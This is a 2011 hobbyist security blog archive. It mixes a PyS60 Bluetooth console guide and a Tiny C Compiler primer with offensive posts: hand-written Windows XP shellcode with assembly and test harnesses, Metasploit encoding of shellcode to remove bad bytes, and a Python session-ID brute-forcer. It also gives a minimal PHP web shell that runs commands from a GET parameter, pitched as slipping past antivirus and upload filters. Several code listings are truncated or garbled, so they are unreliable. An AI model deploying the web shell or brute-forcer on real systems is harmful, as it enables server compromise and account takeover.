Monday, October 31, 2011

Getting into a symbian mobile device using Python.(Bluetoothinteractive console using pyS60)

Like any other computing device, playing with mobile devices is always a great fun for me.
It’s almost 5-6 year’s I've been playing around with series 60 mobile devices. Previously i was using Nokia N72.
Nokia N72 has built in Symbian 2nd Edition operating system in it.
For last 5-6 months i am using Nokia C6-00.and believe me, It’s really a great piece of technology.
It has built in Symbian OS v9.4, Series 60 rel. 5.So it just really rocksssss.

Now lets come to the point. If you are using any series 60 device => v2.And if you are lazy enough( like me :P :P :P like Sit python, Stand Python Eat Python, Sleep python)
Then there is good news for you. Like your Linux/Windows PCs you can also run python script on your series 60 device to automate job you want. Not only automation
you can even write fully featured GUI application using for your series 60 device.

In this article i am not going to teach you how to write python script for your series 60 devices, bcoz if you already know python, there is nothing new in it.

Here i will tell you how you can execute "python shell command" on your series 60 device from your PC via Bluetooth.

So to do this you must have following things.. :P :P

1>A series S60 device With PyS60 installed in it (I will tell you how to get PyS60 later on)
2>A PC with Bluetooth connectivity.

Getting Python interpreter for your Series 60 Device:
In this link you will get all version of Pys60.Choose whatever version you want depending upon your Series 60 version.
Preparing your PC to receive python reverse shell form the mobile device:
I am assuming that you already have a working Bluetooth device attached to your PC with all the Device drivers installed.
To test if your Bluetooth device is working or not i suggest to transfer anything between your PC and Mobile Device.
And also find that both devices are discoverable.

Now go to control panel
Select Phones and Modem Option

Go to Modems Tab
Select the modem you are going to USE.

Here you will get the virtual com port through which your PC will be communicating with your Series 60 device.
In this case I will be using COM5.

Now go to start -- > Accessories --> Communications --> Hyper Terminal

Now Hyper Terminal widow should open up.

Now go to File -- > Properties

Now Select the COM port. Here I will select COM5.

Now save this setting by pressing OK
Now go to 'call" Tab and select Wait for a Call.

Now you have to enter the connection Name. Enter whatever you want and press OK.

If everything is fine you should see "Connected" and a timer in the Lower Left corner of the Hyper Terminal window.

By doing this you have successfully configured you PC to accept connection form your series 60 device.

Now in your Series 60 Device

Go to Menu open up Python.In my case i will be using Python 1.9.7.

If python is successfully installed you should get following window.

Now Go to Options and Select "Bluetooth Console".

Now you have to search for your PC and selcet your PC form the Device List.

After selecting your PC from the list if everything configured well you should see the following in your series 60 Device.

And in the Hyper Terminal Window you should get the Python Shell of your series S60 device.

Now you can execute whatever python shell command you want in your S60 device just entering the command in the hyperlink window.
Now to test the connection type these lines in Hyper Terminal:
import audio
If every thing is fine you should hear a voice from your phone saying "Helloooo!!!"

Thursday, October 27, 2011

ARWIN Source Code

#include <windows.h>
#include <stdio.h>

arwin - win32 address resolution program
by steve hanna v.01
you are free to modify this code
but please attribute me if you
change the code. bugfixes & additions
are welcome please email me!
to compile:
you will need a win32 compiler with
the win32 SDK

this program finds the absolute address
of a function in a specified DLL.
happy shellcoding!

int main(int argc, char** argv)
HMODULE hmod_libname;
FARPROC fprc_func;

printf("arwin - win32 address resolution program - by steve hanna - v.01\n");
if(argc < 3)
printf("%s <Library Name> <Function Name>\n",argv[0]);

hmod_libname = LoadLibrary(argv[1]);
if(hmod_libname == NULL)
printf("Error: could not load library!\n");
fprc_func = GetProcAddress(hmod_libname,argv[2]);

if(fprc_func == NULL)
printf("Error: could find the function in the library!\n");
printf("%s is located at 0x%08x in %s\n",argv[2],(unsigned int)fprc_func,argv[1]);


Beep Beep Shell Code

If this shell code is injected into any process,a Beep sound will occur with an interval of 20 seconds.
This shell code is hard coded for Windows XP.Gonna work fine with all service packs of XP,but due to "ASLR" in Vista or Win-7 it will not work.

Basically i have used 2 built in functions in windows.

These two functions are defined in "Kernel32.dll"
Like always i will use ARWIN to get the virtual address of the above mentioned function in Kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll Beep
arwin – win32 address resolution program – by steve hanna – v.01
Beep is located at 0x7c837aa7 in kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll Sleep
arwin – win32 address resolution program – by steve hanna – v.01
Sleep is located at 0x7c802446 in kernel32.dll

From above we can see virtual address of these two functions are 0x7c837aa7(Beep) and 0x7c802446 (Sleep)
From MSDN we can see that "Beep" function accepts two arguments Frequency and duration of the Beep.
__in  DWORD dwFreq,
__in  DWORD dwDuration

and Sleep function accepts one argument that is only Duration of the beep.
__in  DWORD dwMilliseconds

The assembly code will be like following..

[SECTION .text]

global _start

mov ecx,5                   ; Loop
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx

mov eax, 0x7c837aa7 ;address of Beep
mov bx, 750         ;Frequency
mov dx, 50     ;Duration 
push ebx
push edx
call eax     ;Call Beep

xor eax,eax
xor ebx,ebx
mov ebx, 0x7c802446 ;address of Sleep
mov ax, 20000       ;pause for 20 Seconds
push eax
call ebx            ;

dec ecx
jnz loop

Next step is to assemble the above code with NASM assembler.

D:\exploitkit\nasm>nasm -f elf Beep.asm
D:\exploitkit\>ld.exe -o Beep Beep.o

Then we will get an object file that is Beep.o

From that object file will get Mnemonics of the Instructions.
The objdump out put will be like this..

D:\exploitkit>objdump -d Beep.o

Beep.o:     file format elf32-i386

Disassembly of section .text:

00000000 <_start>:
0:   b9 05 00 00 00          mov    $0x5,%ecx

00000005 <loop>:
5:   31 c0                   xor    %eax,%eax
7:   31 db                   xor    %ebx,%ebx
9:   31 c9                   xor    %ecx,%ecx
b:   31 d2                   xor    %edx,%edx
d:   b8 a7 7a 83 7c          mov    $0x7c837aa7,%eax
12:   66 bb ee 02             mov    $0x2ee,%bx
16:   66 ba 32 00             mov    $0x32,%dx
1a:   53                      push   %ebx
1b:   52                      push   %edx
1c:   ff d0                   call   *%eax
1e:   31 c0                   xor    %eax,%eax
20:   31 db                   xor    %ebx,%ebx
22:   bb 46 24 80 7c          mov    $0x7c802446,%ebx
27:   66 b8 e8 03             mov    $0x3e8,%ax
2b:   50                      push   %eax
2c:   ff d3                   call   *%ebx
2e:   49                      dec    %ecx
2f:   75 d4                   jne    5 <loop>
31:   31 c0                   xor    %eax,%eax
33:   b8 12 cb 81 7c          mov    $0x7c81cb12,%eax
38:   50                      push   %eax
39:   ff d0                   call   *%eax


So the final shell code is like ..

\xbb 46\x24\x80\x7c

To test this shell code compile the following code with any C compiler .

char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb8
int main(int argc, char **argv)
int (*func)();
func = (int (*)()) code;

Again opening the executable in Immunity Debugger we can see the same code but in details..

00401000 > $ B9 05000000    MOV ECX,5
00401005   > 31C0           XOR EAX,EAX
00401007   . 31DB           XOR EBX,EBX
00401009   . 31C9           XOR ECX,ECX
0040100B   . 31D2           XOR EDX,EDX
0040100D   . B8 A77A837C    MOV EAX,kernel32.Beep
00401012   . 66:BB EE02     MOV BX,2EE
00401016   . 66:BA 3200     MOV DX,32
0040101A   . 53             PUSH EBX                                 ; /Duration
0040101B   . 52             PUSH EDX                                 ; |Frequency
0040101C   . FFD0           CALL EAX                                 ; \Beep
0040101E   . 31C0           XOR EAX,EAX
00401020   . 31DB           XOR EBX,EBX
00401022   . BB 4624807C    MOV EBX,kernel32.Sleep
00401027   . 66:B8 E803     MOV AX,3E8
0040102B   . 50             PUSH EAX                                 ; /Timeout
0040102C   . FFD3           CALL EBX                                 ; \Sleep
0040102E   . 49             DEC ECX
0040102F   .^75 D4          JNZ SHORT Beep.00401005

Thursday, October 20, 2011

Compile and execute C code everywhere!!

The Tiny C Compiler (aka TCC, tCc, or TinyCC) is an x86 and x86-64 C compiler created by Fabrice Bellard. It is designed to work for slow computers with little disk space (e.g. on rescue disks). Windows operating system support has been added in version 0.9.23 (17 Jun 2005). TCC is distributed under the GNU Lesser General Public License (LGPL).


Its small file size (about 100 KB for the x86 TCC executable) and memory footprint allow it to be used directly from a single 1.44 M floppy disk, such as a rescue disk.
TCC is intended to produce native x86 and x86-64 code very quickly; according to Bellard, it compiles, assembles and links the Links web browser about 9 times faster than GCC does.[1]
TCC has a number of compiler-specific language features intended to improve its practicality, such as an optional memory and bound checker, for improved code stability.
TCC allows programs to be run automatically at compile time using a command-line switch. This allows programs to be run as a shell script under Unix-like systems which support the shebang interpreter directive syntax.


tcc [options] [infile1 infile2…] [‘-run’ infile args…]

Compile ‘a.c’ and execute it directly :

tcc -run a.c arg1

Compile a.c and execute it directly. arg1 is given as first argument to the main() of a.c.

tcc a.c -run b.c arg1

Compile ‘a.c’ and ‘b.c’, link them together and execute them. arg1 is given as first argument to the main() of the resulting program.

tcc -o myprog a.c b.c

Compile ‘a.c’ and ‘b.c’, link them and generate the executable ‘myprog’.

tcc -o myprog a.o b.o

link ‘a.o’ and ‘b.o’ together and generate the executable ‘myprog’.
tcc -c a.c

Compile ‘a.c’ and generate object file ‘a.o’.
tcc -c asmfile.S

Preprocess with C preprocess and assemble ‘asmfile.S’ and generate object file ‘asmfile.o’.
tcc -c asmfile.s

Assemble (but not preprocess) ‘asmfile.s’ and generate object file ‘asmfile.o’.

tcc -r -o ab.o a.c b.c

Compile ‘a.c’ and ‘b.c’, link them together and generate the object file ‘ab.o’.


TCC can be invoked from scripts, just as shell scripts. You just need to add #!/usr/local/bin/tcc -run at the start of your C source:

#!/usr/local/bin/tcc -run
#include <stdio.h>

int main() 
printf("Hello World\n");
return 0;
TCC can read C source code from standard input when ‘-’ is used in place of ‘infile’. Example:

echo 'main(){puts("hello");}' | tcc -run -


Download Link:

Monday, October 17, 2011

Encoding your handmade shell code using Metasploit Encoder

Encoding of shell code is important in real time exploitation b'coz,when you create a shell code that shell code may contain some bad characters,null bytes.Either the transmission protocol, or the end application
can be sensitive to "bad characters" which can break your shellcode in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you are using shell code present in Metasploit framework,then you dont have to concentrate on shell code encoding.Metasploit by default encode the shell code when you are using in the exploitation.
But in many situation when you are using your own shell code in exploits then the shell code must be bad character free.
So to do that you can use Metasploit to encode your handmade shellcode.

To get a list of all encoders present in metasploit framework by running the ./msfencode -l command.
root@bt:~#./msfencode -l -a x86 

Framework Encoders (architectures: x86)

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
The default encoder in Metasploit is x86/shikata_ga_nai

Suppose you have just written the follwoing shell code
So to encode the shell code first you have to write the shell code into a binary file.So to do that you can choose any scripting langugae.

Here i will use python.
shell = ("\x68\x6c\x61\x6e\x00\x68\x43\x6f
file = open('shellcode.bin','w')

After running the script you will get a shell.bin file.Now you are almost done.You just have to fire msfencode to encode the shell code for you.

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
So this is the Bad character and Null free fully working shell code.

Encode using x86/alpha_mixed

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =

Thursday, October 13, 2011

Session ID Brute force

Few days back i was conducting a pen-test of an e commerce application.
Like many other application i found a very common vulnerability in that application
The vulnerability was "Session not Invalidate after logout".
So one attacker can easily use a session id to access victims account even after logout is done.

The big deal was, at the time of account creation the application assigns a session ID for a particular account.
So whenever the user logs into his/her account the application will always assign same session Id.
So if you think in other way then you will find that, it’s like a password.
But as a Hacker point of view one dis-advantage of password protection is you can change the password,
But advantages with this scenario is
Even if a user changes the password the Session id does not change.
And the session id for every account is fixed length.

And one important thing was, Account lockout was present in that application. So if someone try to brute force the login panel it will not work.

So i decided to brute force the session id.

As the application was hosted on a staging environment’s was free to do whatever attack i want against the web server.
This brute force was bit different from, password cracking because maximum time you don’t have any idea about the password length.
But in this case the length of the parameter to be brute forced was known to me.
So it was quite big advantage.
One challenge i have faced was the band width of the staging environment.
The server was responding too slowly.
Like always i used python to automate the whole process.

Here is the single threaded python script.

import httplib, urllib
import gzip
import StringIO
import random
#HOST = ''
HOST = ''
def go(D):
    print "Trying..",D
    conn = httplib.HTTPConnection(HOST)
    headers = {"Host": "",
               "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language:": "en-us,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
               "Proxy-Connection": "keep-alive",
               "Referer": "",
               "Pragma": "no-cache",
               "Cookie": D, }
    conn.request("GET", "/home", "", headers)
    response = conn.getresponse()
    print response.status, response.reason
    compresseddata =
    compressedstream = StringIO.StringIO(compresseddata)  
    gzipper = gzip.GzipFile(fileobj=compressedstream)      
    data =
    #print data
    if "window.location.href" in data:
        print "Sorry...."
        w = open('success.txt','a')
    print "Done.."
#Generate SID
pre = "SID="
max = 25#Maximum Length of Random character
l = len(t)
buff = ''
while 1:
    if len(buff) == max:
        #print buff
        final = str(pre)+str(buff)
        buff = ''
    a = random.randint(0, l)
    b = a+1
    buff += t[a:-l+b]

But i was not successful.
Even after 5 days,i haven’t got a single account id.
Most probably the main reason behind this UN-successful attack was "The staging environment".
To check that, I have created an account in the main application and tried to access the account from the staging environment.
The credentials were not working in the test environment.
So its quite clear form this that the no. of account very less in the test environment, so probability of getting a valid account was too less in the test environment.

Portable PHP Script to execute Shell command

This small PHP script can be used to execute shell command on a web server.
Some time PHP shells like c99.php gets detected by AVS.So in that case this small php script is very use full.And some time the size of the file to be uploaded is very essential,IF the application is filtering upload by size then also this script can be used.

USAGE : This script accepts shell command as GET requests,so just upload this script,and execute command like this


You will see the out put of that command.

$cmd = $_GET["c"];
if ($cmd == "") 
echo "<B>Usage ::<your command></B>";
$output = null;
exec($cmd, $output);
echo "<pre>" . var_export($output, TRUE) . "</pre>\\n";

Monday, October 10, 2011

Open all PORTS

This multi threaded python script can be used to open a certain range of TCP port of a PC.
If you are conducting network security scans,then its very important to check if your ISP's firewall is filtering any packet/ports or not.Your scan result may contain false+ve if your ISP is blocking any malicious packets.
So you can use the script to open all ports of a sample target and probe the target with various crafted packets.(ex. Nmap,Nessus)
If the scan result returns the expected result,Then its fine,but if you get some ports are closed but,you know that its open then its a thing to worry for security scanning.
You have to change the 2nd last line to select the tcp PORT range.

Here is the python script:

import socket
import thread
from threading import *
def handler(clientsock,addr):
    while 1:
        data = clientsock.recv(BUFSIZ)
        if not data:
def openport(PORT):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    HOST = socket.gethostname()
    #PORT = 1234
    BUFSIZ = 1024
    print 'Listening on port :',PORT
    while 1:
        print 'Waiting for connection:'
        clientsock, addr = s.accept()
        print 'Connected with: ', addr
        thread.start_new_thread(handler, (clientsock, addr))
        for P in range(1,5):    #The port range to open
            thread.start_new_thread(openport, (P,))

My first Handmade shell code!!

What is shell code?? (Wiki Definition)
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of software vulnerability.
Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode.
It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.
An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

Shell code can be of two types.

Local Shell code and Remote Shell code.
Here i will write a simple Local shell code which will just generate a "MessageBOX"
Tools i generally use for shell coding are....
1)Nasm (Assembler )
2)Objdump(You can get this with Dev C++)
3)Dev C++
4)Ollydebug or you can use any debugger.
5)Arwin The C code freely available ,Get that and compile with any c compiler.

I did this entire thing on windows platform but,if you are a linux user you can do the same thing on any distribution of Linux.
But the main difference between Linux and windows shell code is
Linux, unlike windows, provides a direct way to interface with the kernel through the int 0x80 interface.
Windows on the other hand, does not have a direct kernel interface. The system must be interfaced by loading .the address of the function that needs to be executed from a DLL (Dynamic Link Library).The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant.
First thing you have do while writing a working shell code for windows platform is, find the addresses of your needed DLL functions.

So to do that the tool i generally use is arwin.You can do the same thing by using any debugger. I will not explain that but using arwin is much simpler and easier.
The library functions i will be using for this simple shell code are "LoadLibraryA",'GetProcAddress", "MessageBoxA" and "ExitProcess"
Let's fire up arwin and find the addresses we need to use.
You just have to do the following things to get addresses of our required functions...

D:\exploitkit\arwin>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

Now we have the required addresses...

After getting that you have to write down the code into here is the code.....

; Assembly code starts here.....
[SECTION .text]

global _start


xor eax,eax
xor ebx,ebx   ;zero out the registers
xor ecx,ecx
xor edx,edx

jmp short GetLibrary
pop ecx   
mov [ecx + 10], dl 
mov ebx, 0x77e7d961  ;LoadLibraryA(libraryname);
push ecx   ;beginning of user32.dll
call ebx  

jmp short FunctionName

pop ecx  
xor edx,edx
mov [ecx + 11],dl 
push ecx
push eax
mov ebx, 0x77e7b332  ;GetProcAddress(hmodule,functionname);
call ebx   

jmp short Message
pop ecx    ;get the message string
xor edx,edx   
mov [ecx+3],dl  

xor edx,edx

push edx   ;MB_OK
push ecx   ;title
push ecx   ;message
push edx   ;NULL window handle

call eax   ;MessageBoxA(windowhandle,msg,title,type); Addre

xor edx,edx
push eax   
mov eax, 0x77e798fd   ;Address of Exitprocess;
call eax   ;exit cleanly so we don't crash the parent program

call LibraryReturn
db 'user32.dllN'
call FunctionReturn
db 'MessageBoxAN'
call MessageReturn
db 'You are Hacked by Raza'

After that save the code as Shell.asm

Now its time to get the raw binary of the code we have just written.

To do that you have to use nasm assembler and objdump.

D:\exploitkit\nasm>nasm -f elf shell.asm
D:\exploitkit\>ld.exe -o shell shell.o
D:\exploitkit>objdump -d shell

The out put will be like this…
shell:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       31 c0                   xor    %eax,%eax
8048082:       31 db                   xor    %ebx,%ebx
8048084:       31 c9                   xor    %ecx,%ecx
8048086:       31 d2                   xor    %edx,%edx

8048088:       eb 37                   jmp    80480c1 

0804808a :
804808a:       59                      pop    %ecx
804808b:       88 51 0a                mov    %dl,0xa(%ecx)
804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
8048093:       51                      push   %ecx
8048094:       ff d3                   call   *%ebx
8048096:       eb 39                   jmp    80480d1 

08048098 :
8048098:       59                      pop    %ecx
8048099:       31 d2                   xor    %edx,%edx
804809b:       88 51 0b                mov    %dl,0xb(%ecx)
804809e:       51                      push   %ecx
804809f:       50                      push   %eax
80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
80480a5:       ff d3                   call   *%ebx
80480a7:       eb 39                   jmp    80480e2 

080480a9 :
80480a9:       59                      pop    %ecx
80480aa:       31 d2                   xor    %edx,%edx
80480ac:       88 51 03                mov    %dl,0x3(%ecx)
80480af:       31 d2                   xor    %edx,%edx
80480b1:       52                      push   %edx
80480b2:       51                      push   %ecx
80480b3:       51                      push   %ecx
80480b4:       52                      push   %edx
80480b5:       ff d0                   call   *%eax

080480b7 :
80480b7:       31 d2                   xor    %edx,%edx
80480b9:       50                      push   %eax
80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
80480bf:       ff d0                   call   *%eax

080480c1 :
80480c1:       e8 c4 ff ff ff          call   804808a 
80480c6:       75 73                   jne    804813b 
80480c8:       65                      gs
80480c9:       72 33                   jb     80480fe 
80480cb:       32 2e                   xor    (%esi),%ch
80480cd:       64                      fs
80480ce:       6c                      insb   (%dx),%es:(%edi)
80480cf:       6c                      insb   (%dx),%es:(%edi)
80480d0:       4e                      dec    %esi

080480d1 :
80480d1:       e8 c2 ff ff ff          call   8048098 
80480d6:       4d                      dec    %ebp
80480d7:       65                      gs
80480d8:       73 73                   jae    804814d 
80480da:       61                      popa  
80480db:       67                      addr16
80480dc:       65                      gs
80480dd:       42                      inc    %edx
80480de:       6f                      outsl  %ds:(%esi),(%dx)
80480df:       78 41                   js     8048122 
80480e1:       4e                      dec    %esi

080480e2 :
80480e2:       e8 c2 ff ff ff          call   80480a9 
80480e7:       48                      dec    %eax
80480e8:       65                      gs
80480e9:       79 4e                   jns    8048139</code>

Now we are almost done. We just have to collect the machine code from the command prompt output.

So our final shell code will looks like...

To test shell codes the code i use is following...


char code[] = "opcode will go here!";
int main(int argc, char **argv)
int (*func)();
func = (int (*)()) code;

Just put your shell code into code[] and compile it with devC++
When you will execute it you should get a message box if everything is fine....